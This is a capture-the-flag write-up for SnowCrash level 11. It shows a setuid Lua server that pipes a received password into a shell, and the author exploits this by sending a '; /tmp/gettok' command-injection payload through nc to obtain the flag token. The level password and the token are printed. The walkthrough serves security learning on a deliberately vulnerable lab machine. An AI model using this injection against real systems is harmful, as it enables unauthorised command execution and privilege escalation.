| .. | ||
| flag | ||
| passwd | ||
| README.md | ||
Level 11
how to login
username: level11
password: feulo4b72j7edeahuete3no7c
Goal
run getflag as user flag11
Actually doing something
level11@SnowCrash:~$ ll
total 16
dr-xr-x---+ 1 level11 level11 120 Mar 5 2016 ./
d--x--x--x 1 root users 340 Aug 30 2015 ../
-r-x------ 1 level11 level11 220 Apr 3 2012 .bash_logout*
-r-x------ 1 level11 level11 3518 Aug 30 2015 .bashrc*
-rwsr-sr-x 1 flag11 level11 668 Mar 5 2016 level11.lua*
-r-x------ 1 level11 level11 675 Apr 3 2012 .profile*
a setuid script ? something seems fishy, lets open it
#!/usr/bin/env lua
local socket = require("socket")
local server = assert(socket.bind("127.0.0.1", 5151))
function hash(pass)
prog = io.popen("echo "..pass.." | sha1sum", "r")
data = prog:read("*all")
prog:close()
data = string.sub(data, 1, 40)
return data
end
while 1 do
local client = server:accept()
client:send("Password: ")
client:settimeout(60)
local l, err = client:receive()
if not err then
print("trying " .. l)
local h = hash(l)
if h ~= "f05d1d066fb246efe0c6f7d095f909a7a0cf34a0" then
client:send("Erf nope..\n");
else
client:send("Gz you dumb*\n")
end
end
client:close()
end
it seems to be a server that ask for a password, check that the password is correct and does something ?
Lookit at the hash function, we do see a nice little shell injection oportunity, lets try something :D
we want to have something that write the getflag somewhere like we did before.
what about the same script:
level11@SnowCrash:~$ cat <<EOF >/tmp/gettok
#!/bin/sh
getflag >/tmp/flag
chmod 777 /tmp/flag
EOF
level11@SnowCrash:~$ chmod +x /tmp/gettok
level11@SnowCrash:~$ echo "; /tmp/gettok" | nc localhost 5151
Password: Erf nope..
level11@SnowCrash:~$ cat /tmp/flag
Check flag.Here is your token : fa6v5ateaw21peobuub8ipe6s
and voila :D